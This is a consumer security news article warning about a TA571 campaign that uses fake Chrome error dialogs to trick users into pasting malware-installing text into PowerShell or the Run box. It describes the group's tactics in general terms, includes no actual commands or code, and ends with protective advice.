A seemingly harmless action like copying and pasting text could put your computer’s security at risk. Recently, a new type of cyber scam has been detected with malware that is distributed through Google Chrome, affecting users by simply executing malicious code hidden in copied text. This malware, which spreads mainly through PowerShell scripts, has put users and cybersecurity experts on alert.
Google Chrome, one of the most popular browsers, has been the means by which this malware finds its way to infect users’ systems. The scam begins when the user, while browsing, comes across a fake error dialog suggesting you copy and paste a specific text in PowerShell or in the Windows “Run” dialog box.
This text, once executed, install malware which disguises itself as a legitimate Windows process. Experts warn that the alert provided is convincing and could trick many users into following the instructions without suspecting the scam.
Consequences of malware infection
Once installed, the malware performs a check to determine whether the infected system is connected to a public or private network and, if conditions are suitable, proceeds to execute malicious activities in the background. These can range from installing other types of malware to capturing personal information and banking details.
The presence of malware is difficult to detect once it is operational, as it disguises itself as legitimate processes and can alter system behavior to evade antivirus software.
The TA571 group behind the attack
The group behind this new threat has been identified as TA571, known for its large-scale spam campaigns. They use a tool called ClearFake, which allows fake software updates to be made. These updates are one of the most common ways cybercriminals spread their malicious tools.
Features of the TA571 Group:
1. Focus on malware and ransomware: TA571 has frequently been associated with the distribution of different types of malware, including ransomware and banking Trojans.
2. Phishing campaigns: One of the most common methods used by TA571 is the mass sending of phishing emails. These emails are often designed to look like legitimate communications from well-known companies or government entities, in order to persuade users to click on malicious links or attach infected files.
3. Use of automation tools: The group is characterized by its use of automated tools that allow them to send large volumes of malicious emails quickly and efficiently, maximizing the reach of their campaigns and increasing the likelihood of success.
4. Adaptability and Evolution: TA571 constantly adapts its tactics and improves its tools to avoid detection by security software and to be effective against the latest technological defenses. They change their attack patterns and update their malware payloads to stay one step ahead of cyber defenders.
Detection strategies and measures to protect yourself
Not all users have the sufficient technological training to detect that these warnings are rare and they don’t come from Windows. At first, most users might feel the urge to fix the problem immediately by following the instructions that will unknowingly install the malware.
Cybersecurity specialists recommend being especially alert any dialog box that asks for unusual actions such as copying and pasting commands in system tools. Ignoring these messages and closing the browser window could be the difference between maintaining a secure system and falling victim to a cyberattack.
Additionally, it is recommended that users perform regular scans with updated antivirus software and consider using browser extensions that block suspicious sites and downloads.
